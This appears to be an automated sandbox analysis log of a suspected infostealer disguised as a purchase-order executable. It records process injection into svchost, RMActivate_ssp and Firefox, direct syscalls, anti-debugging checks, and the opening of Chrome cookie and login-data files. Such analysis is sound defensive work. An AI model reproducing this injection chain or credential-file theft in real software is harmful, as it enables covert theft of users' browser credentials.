            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001B0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_00182622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_0017083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001709D5 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_00170C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe protection: read write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Thread register set: target process: 6432
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Thread APC queued: target process: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E61008
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_00192BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001BB226 SendInput,keybd_event
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001D22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001B0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001B1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: PO2-2401-0016 (TR).exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: WwOlfblnYaWmLq.exe, 00000003.00000002.4509220192.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000000.2202166143.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000000.2350611108.0000000001651000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: PO2-2401-0016 (TR).exe, WwOlfblnYaWmLq.exe, 00000003.00000002.4509220192.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000000.2202166143.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000000.2350611108.0000000001651000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: WwOlfblnYaWmLq.exe, 00000003.00000002.4509220192.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000000.2202166143.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000000.2350611108.0000000001651000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: WwOlfblnYaWmLq.exe, 00000003.00000002.4509220192.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000000.2202166143.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000000.2350611108.0000000001651000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_00170698 cpuid
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001C8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001AD27A GetUserNameW
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_0018B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe Code function: 0_2_001542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
